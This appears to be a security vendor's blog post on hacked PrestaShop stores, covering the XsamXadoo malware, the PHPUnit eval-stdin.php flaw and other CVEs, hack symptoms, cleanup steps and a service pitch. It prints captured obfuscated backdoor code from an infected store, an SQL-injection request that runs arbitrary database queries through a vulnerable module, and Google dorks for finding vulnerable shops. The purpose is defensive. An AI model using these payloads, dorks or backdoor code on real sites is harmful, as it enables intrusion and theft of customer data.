Prestashop Hacked – Security Vulnerabilities & Site Clean Up

Prestashop Hacked

 

In the past, PrestaShop has undergone various hack attempts. E-commerce security bears great significance as it is somewhere connected to instant revenue loss. In the past couple of years, the use of e-commerce solution has increased alarmingly owing to which ‘PrestaShop hack’ has increased extensively.

It has become imperative for users to spend more time and money on Prestashop security. In this article, you will know more about why Prestashop sites keep getting hacked again, Vulnerabilities present in prestashop, How to clean up hacked prestashop site & muich more.

Of late, PrestaShop has discovered a malware in 2020 named XsamXadoo Bot. Let us first discuss this malware in detail.

Critical Prestashop Vulnerability – Xsamxadoo Malware

A couple of days back, PrestaShop (an open-source E-commerce solution) shared particulars about a potential threat of a malware known as XsamXadoo on its stores.

Using this malware, the hacker gets easy access to your PrestaShop store. In the past, many store owners of this popular E-commerce solution have, reportedly, already become prey to this malware. This particular malware uses a known vulnerability present in the PHP tool. It was immediately shared under CVE-2017-9841.

Stay tuned to know more details about this malware and how you can confiscate this malware. Besides, we will share the steps you should espouse to check the vulnerability in your stores.

Is your Prestashop Hacked? Get in touch with us and we’d be happy to assist you. Secure your Prestashop now.

Here is a list of known malicious files that may indicate a compromised shop:

• XsamXadoo_Bot.php
• XsamXadoo_deface.php
• 0x666.php
• f.php
• Xsam_Xadoo.html

To check if Core PrestaShop files have been modified > look at the “List of changed files” section at the bottom of the “Advanced Parameters > Information” page in your Back Office.

PrestaShop modules impacted by XsamXadoo

• 1-Click Upgrade (autoupgrade): versions 4.0 beta and later
• Cart Abandonment Pro (pscartabandonmentpro): versions 2.0.1~2.0.2
• Faceted Search (ps_facetedsearch): versions 2.2.1~3.0.0
• Merchant Expertise (gamification): versions 2.1.0 and later
• PrestaShop Checkout (ps_checkout): versions 1.0.8~1.0.9

Prestashop Vulnerability

As discussed above, we have found the vulnerability in PHP tool – PHP Unit and it is identified as CVE-2017-9841.The vulnerability affects the file in the PHP Unit folder – “Util/PHP/eval-stdin.php”.

If you are one of those who were on PHP Unit versions before 4.8.28 or using versions 5.x before 5.6.3 then you are prone to this vulnerability.

Is My Prestashop Website Safe

We came across number of foums where people ask questions such as

• Why my prestashop site keeps getting hacked, same hack across all sites on my server
• Prestashop site index.php hacked ?
• How to fix hacked prestashop site?

If you are skeptical about whether or not your store is vulnerable to the attack, you should do the following things to get rid of all your doubts –

• You need to find Vendor Folder– ‘/vendor‘in the root directory of your PrestaShop website.
• The presence of the ‘PHP Unit’ folder in the Vendor folder increases the susceptibility to an attack. You don’t need to be worried sick as you need to delete the ‘PHP Unit’ folder and the contents present in the folder.
• When you have gone through the main PrestaShop folder, replication of the same steps needs to be done. Ideally, this replication is done in each module folder. You need to go through each module folder thoroughly to check for the ‘Vendor folder’.
• You don’t need to worry all this will not affect the behavior of the module. Follow this step and you will be able to save your store against this vulnerability; however, the fact cannot be denied that your website may have already been compromised by now.

How to Check if Your Prestashop site is Vulnerable

You don’t need to worry as checking your store for risk is like shooting a fish in the barrel. Just follow the below-mentioned steps –

• You can access your website through FTP like Filezilla.
• Make sure you have taken a backup of your website.
• Reach out to the /vendor folder in the root directory of your website.
• You need to look for the PHP Unit folder.

Connect  via FTP or shell access > look at the “vendor” directory in the main prestashop folder inside each module:

• <prestashop_directory>/vendor
• <prestashop_directory>/modules/<module_name>/vendor

If there’s a directory called “phpunit” inside the aforementioned directories, your shop might be hacked

Warning: don’t touch anything else or you might break your shop Other files and folders (e.g /vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit/ or .xml files) are safe, do not delete them.

Now, at this stage, two cases may arise.

Case 1– Remove phpunit Security Hole

If the folder is there, you are at risk. First and foremost, you need to delete the PHP Unit folder. Rest assured, deleting the PHP Unit folder won’t affect the functioning of your website. This move will end up reducing the risk of your store may be vulnerable to XsamXadoo malware.

Go ahead and repeat the same process from the beginning with all your modules i.e. search, find, delete the PHP Unit folder & save your store from critical security vulnerability in prestashop modules.

Case 2 – Absence of PHP folder

Congratulations, you don’t need to worry as you are safe. However, if you want you can still choose to go one step ahead and secure your PrestaShop Store with the best possible security measures.

NOTE:  You can also scan your site using a prestashop exploit or prestashop vulnerability scanner online.

Prestashop Hack Symptoms

Before You Fix hacked Prestashop, You Should Know About Prestashop Hack Symptoms –

• The hacker can create fake pages on your website.
• Search engines can blacklist your website.
• You will lose your user’s trust.
• The hacker can steal important and sensitive details such as – credit card details and login, banking passwords.
• Your website can be disabled by your hosting company.
• Significant loss of revenue.
• The speed of your website becomes slow and shows numerous error messages.
• Users face pop-ups and ads whenever they visit your website.
• The customers can be redirected to another website.

Prestashop Hacked Example

Here’s an example:

home/i***/public_html/fractals**.com/css/index.php

<?php
/*301f7*/

@include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o";

/*301f7*/
/*
* 2007-2017 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@prestashop.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <contact@prestashop.com>
*  @copyright  2007-2017 PrestaShop SA
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");

header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

header("Location: ../");
exit;

You can see a random letter.php file inserted in the same directory, see image below

which contains the following code:

<?php
$scgcwgc = '23p61vsfr-8#*ae0oy_uxHt594ck\'gmdil7nb';$nocgph = Array();$nocgph[] = $scgcwgc[21].$scgcwgc[12];$nocgph[] = $scgcwgc[11];$nocgph[] = $scgcwgc[15].$scgcwgc[31].$scgcwgc[7].$scgcwgc[23].$scgcwgc[1].$scgcwgc[31].$scgcwgc[23].$scgcwgc[1].$scgcwgc[9].$scgcwgc[23].$scgcwgc[15].$scgcwgc[31].$scgcwgc[13].$scgcwgc[9].$scgcwgc[25].$scgcwgc[31].$scgcwgc[26].$scgcwgc[3].$scgcwgc[9].$scgcwgc[13].$scgcwgc[34].$scgcwgc[31].$scgcwgc[26].$scgcwgc[9].$scgcwgc[0].$scgcwgc[24].$scgcwgc[3].$scgcwgc[36].$scgcwgc[15].$scgcwgc[15].$scgcwgc[26].$scgcwgc[10].$scgcwgc[0].$scgcwgc[34].$scgcwgc[0].$scgcwgc[4];$nocgph[] = $scgcwgc[26].$scgcwgc[16].$scgcwgc[19].$scgcwgc[35].$scgcwgc[22];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[18].$scgcwgc[8].$scgcwgc[14].$scgcwgc[2].$scgcwgc[14].$scgcwgc[13].$scgcwgc[22];$nocgph[] = $scgcwgc[14].$scgcwgc[20].$scgcwgc[2].$scgcwgc[33].$scgcwgc[16].$scgcwgc[31].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[19].$scgcwgc[36].$scgcwgc[6].$scgcwgc[22].$scgcwgc[8];$nocgph[] = $scgcwgc[13].$scgcwgc[8].$scgcwgc[8].$scgcwgc[13].$scgcwgc[17].$scgcwgc[18].$scgcwgc[30].$scgcwgc[14].$scgcwgc[8].$scgcwgc[29].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[33].$scgcwgc[14].$scgcwgc[35];$nocgph[] = $scgcwgc[2].$scgcwgc[13].$scgcwgc[26].$scgcwgc[27];foreach ($nocgph[7]($_COOKIE, $_POST) as $tmqgiuw => $xienbb){function paloe($nocgph, $tmqgiuw, $duopzf){return $nocgph[6]($nocgph[4]($tmqgiuw . $nocgph[2], ($duopzf / $nocgph[8]($tmqgiuw)) + 1), 0, $duopzf);}function tsqylud($nocgph, $anjcq){return @$nocgph[9]($nocgph[0], $anjcq);}function pslmija($nocgph, $anjcq){$pqbygpl =

At times, you may notice that the index.php files have like

@include “\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o”;

Notice that at the end of the path there is an .ico file. This is the source of the problem and must be removed.

Possible Causes of Prestashop Hack (Vulnerabilities)

Possible causes of prestashop exploit are as follows –

PrestaShop Hacked: SQL Injection

In PrestaShop, one of the common vulnerabilities is SQL Injection or malicous code injection. Since it deals with the database, this is what makes it serious. This occurs when you provide un-sanitized input. Then the DBMS tends to execute the query from the input, leading to the divulgence of the key details.

The cause was first reported in 2014.The issue was detected within the parameter id_manufacturer.

http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection]

The following line of code offers unsanitized input following id_manufacturer. Therefore, it is easier for the hacker to read the database, hence compromising the security of the PrestaShop. Additionally, the hacker can further automatically exploit using tools such as Sqlninja, Sqlmap, etc.

Of late, a new PrestaShop SQL injection has been discovered. The E-commerce solution version (1.5.5.0 – 1.7.2.5) was found to suffer from this vulnerability and it was known as CVE-2018-8824. This was caused by the module known as Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro. So, if you have downloaded this module, you need to update it right away.

GET: http://site/modules/bamegamenu/ajax_phpcode.php?code=p(Db::getInstance()-

>ExecuteS("show tables"));

With the help of this code, data is fetched using the ajax query from the vulnerable parameter. You will be able to have a look at the tables present in the database.

You will be able to perform the database operation of your choice; you just need to replace the statement – “show tables” with the statement of your choice, it will be much easier to perform database operations. So, it will be easy for the hacker to go through the sensitive tables.

Login details are revealed through these tables, PrestaShop security has been breached and the dashboard can be easily hacked.

Prestashop Hacked: Privilege Escalation Vulnerability

This is one of the serious security issues of PrestaShop. This issue occurs when a user having lower privileges is provided higher privileges. This issue for PrestaShop was discovered in 2011 and the latest one was discovered in 2018.

All PrestaShop versions below 1.6.1.19 suffered from this issue. This vulnerability was known as CVE-2018-13784. The key fault behind this issue is the buggy encryption of the user cookie. This E-commerce solution makes use of Blowfish/ECD or AES encryption through openssl_encrypt(). So, this makes it prone to padding oracle attacks.

Besides, the hacker also gets an easy opportunity to both read and write the contents of a PrestaShop cookie. Therefore, the users tend to visit the cookies that are not meant for it, leading to privilege escalation. The hacker can –

• Have an easy access to sensitive information such as – credit card details.
• Gain easy access to any user session.
• Become the admin of your website and perform malicious activities.

The whole process where the cookies are being issued takes place in ./classes/Cookie.php.

Also Read – Privilege Escalation Vulnerability WordPress

Prestashop Hacked: Compatibility Issues

Probably, when you run PrestaShop on a WordPress installation, you will come across compatibility issues more often. It has been noticed, that WordPress updates to the latest version automatically. In contrast, this is a practical practice. However, the main area of disagreement lies in a failed update. Therefore, this further becomes clear when the process of WordPress is unsuccessful.

WordPress Failed Update Process –

Step 1 – Try to update.

During the process of update, move and edit the file.

Step 2 – Update Filed.

In a situation where the update has failed, make sure you create a copy of wp-config.php.

Step 3 – Exit

You need to save it as a text file on the server.

Well, the above information looks fine, wait, no actually. A .txt copy of file wp-config.php is created by WordPress. Now, the server has the sensitive details of the PrestaShop database in the form of a txt file. Special scanners are being made to look out for such files. Now, the hacker can go ahead and conduct a PrestaShop hack. This is the outcome of faulty WordPress installation.

Prestashop Hacked: Remote Code Execution

The sole source of this hack is buggy coding. As per this hack, the hacker can, remotely, run code on your system and leave your server compromised. A remote code execution vulnerability was discovered in PrestaShop security. It was named CVE-2018-8823 and the vulnerability was found in the Responsive Mega Menu Pro module.

The main cause behind this was an unknown function found in the file modules/bamegamenu/ajax_phpcode.php. The code can be easily run remotely by making changes in the parameters. There is no need to have a formal authentication to exploit it.

Prestashop Website Hacked: Weak Passwords and Directory Permissions

There is a possibility that the word ‘admin’ can compromise a company. Most of the time, people tend to overlook default installation. Make sure that no installation should have a default password and the root directory should not be visible on the internet as it may leak installation files.

Prestashop Hacked: Arbitrary File Upload Vulnerability

At times apt checks and balances are not implemented. Therefore, PrestaShop offers the provision of uploading specially crafted files. This is one of the serious issues as it may compromise your website as well.

What’s worse, it can be used to install the malware in your system. Furthermore, there is no dearth of google dorks who will check for the vulnerable files in bulk. For instance –

inurl:”/modules/columnadverts2/”

or

inurl:”/modules/columnadverts/”

You can easily find vulnerable PrestaShop servers by doing a simple Google search of these terms, faulty coding cannot always be blamed. You might have set faulty permissions.

Prestashop Hacked: XSS Vulnerability and Zero Day Exploits

You must have heard about Cross-site scripting XSS. It is one of the common vulnerabilities. On successful exploitation of an XSS attack, you have to go through the following situations –

• Your admin account will be compromised.
• The hacker will gain access to the Admin cookie.
• Malware will be downloaded on your system.
• The hacker will have access to sensitive files and other details.
• Japanese & Pharma Keyword Hack ( Japanese SEO Spam & Pharma hack)

As per this Black Hat SEO method, the hacker hacks the search engine results of your website. Google or Bing (Google Bots) will crawl your website as if it is in Japanese or Pharma related. You can make yourself familiar about Japanese Keywords Hack or WordPress pharma hack by typing the below-mentioned query in Google –

Site:example.com or Site:example.com japan or Site:example.com Viagra

Japanese SEO spam –

Pharma Spam –

How To Fix Hacked Prestashop – Store Cleanup

If your PrestaShop store is hacked, you can follow the below-mentioned cleanup measures –

Prestashop Website Security: Block Access

The first step that you need to adopt is to block access to all the important folders. You can do this by creating a .htaccess file inside the folders. In that file, you can write –

Order Deny,Allow

Deny from all

Allow from 22.33.44.55

The above code denies access to the file/folder. ‘Allow from 22.33.44.55’means that you are permitting access to particular IPs. You also have the provision of adding a range of IPs. You may want to have a look at .htaccess files as well. In the case of the PrestaShop hack, you must clean them first.

Prestashop Security: Check Permissions

You have to ensure that you have given correct permissions for the files. When it comes to files, they are 644(rw-r–r–) and for directories 755 (rwxr-xr-x). They must be correctly as this will prevent misuse of file access.

Prestashop Security: Rogue Modules

In the past, there have been instances where vulnerable plugins were responsible for the PrestaShop hack. Make sure you check buggy or outdated modules, you can either update them or get rid of them.

Prestashop Security: Encryption Modules

The cleanup process also involves encrypting login values in admin tables. This way you will provide double protection in case your important data gets compromised. Besides, for other applications installed on the same server, you should opt for a separate database.

Prestashop Security: Strong E-store Passwords

It is imperative to have strong FTP and login credentials. Avoid using common phrases and words.

Prestashop Website Security: Obfuscated Code

Hackers, across the globe, make their best to hide the code. Coding experts do this by using encoding that is not easily readable to the human eyes. So, maybe you want to look out for code hidden in the base64 format. If you choose to look for it manually then it will be a cumbersome task to find it. On the other hand, the following piece of code will do the trick for you –

find . -name “*.php” -exec grep “base64″‘{}’\; -print &> fewfwd.txt

The above-mentioned code will search for base64 code and save it inside fewfwd.txt. After analyzing this, you may want to look out for the below-mentioned redirecting domains –

<li><a href=”frefre-domain.com”>Something1</a></li>

To look out for suspicious domains, you can have a look in the file fewfwd.txt.

Prestashop Security: Update and Backup

Make sure you have taken the backup of all your files and update them at regular intervals. Try to install fresh installation only from the official website.

Prestashop Security: Prestashop Website Firewall

If you want to avoid the PrestaShop hack, make sure you use a firewall. With the help of a firewall, you will be able to keep unauthorized users at bay. You can choose from a plethora of firewalls available in the market, some of them are free and some are easy on the pocketbook. You also have the option of using a plugin for this purpose.

Security Announcement – What Happens if My Prestashop Store is Already Infected

If you have found the PHP Unit folder in your store, make sure you delete it. But, even after this, how can you be sure that your store was not compromised?

Well, have a look at your store for the following symptoms –

• You are facing issues while accessing your website.
• Store redirecting to the solicited pages also called malware redirect hack
• The speed of your website has slowed down and started to show error messages as well.
• Customers have started complaining of credit card misuse.
• Payments are also being controlled.
• There has been an addition of new and unknown admins to your website and you are not aware of it.
• Malicious ads and pop-ups tend to show up more frequently on your website.
• Your google ads are disapproved due to malware on site

Security Announcement – Your Store May Be Vulnerable to Malware

What happens if my store is already infected? As per this vulnerability, the hacker gets easy access to your website, for instance – he can easily steal customer’s details. In case you happen to find your recent files, in your store, with the following names shows that your website is compromised –

• php
• php
• php
• php

The best way is to recover a backup before the date of infection and look for the PHP Unit folder. Otherwise, it will become necessary to –

• Carry out a manual cleanup of all the skeptical files.
• Change the password of the back office and ask all your users and customers to change their passwords.
• Ask the hosting provider or an expert to perform a complete scan of your website content.

What Should I Do if My Prestashop Ecommerce Website is Hacked?

If you are eyeing to control the damage as soon as possible, you need to act fast.

One of the most efficient and infallible methods is to take expert help. Avoid getting into intricate methods of complex trials of a self-malware cleanup. Relax and follow the below-discussed steps –

• First and foremost, sign up for malware removal with us.
• Mention the credentials of your website.
• Our security experts will remove malware from website and backdoor in no time.
• Rest assured, your website will up and running.

How We Can Help You Secure Your Prestashop E-Commerce Website?

Our experts are already aware of this vulnerability and we have already secured numerous websites and E-commerce stores. Our experts will perform a complete checkup of various modules on PrestaShop Add-ons to look for the vulnerable PHP Unit folder.

If you have queries or doubts about the PrestaShop website, reach out to us. We will happy to lend a helping hand in protecting and monitoring your PrestaShop website.

Wrap Up

In a short period, PrestaShop stores have encountered massive malware attacks. Unless you have taken prompt action, you may have to suffer from a hacked PrestaShop store.

For advanced security, make sure you implement the best security measures into your store .

24/7 WP Security & Malware Removal

Is your site hacked or infected with malware? Let us get it fixed for you

Secure My Website(s)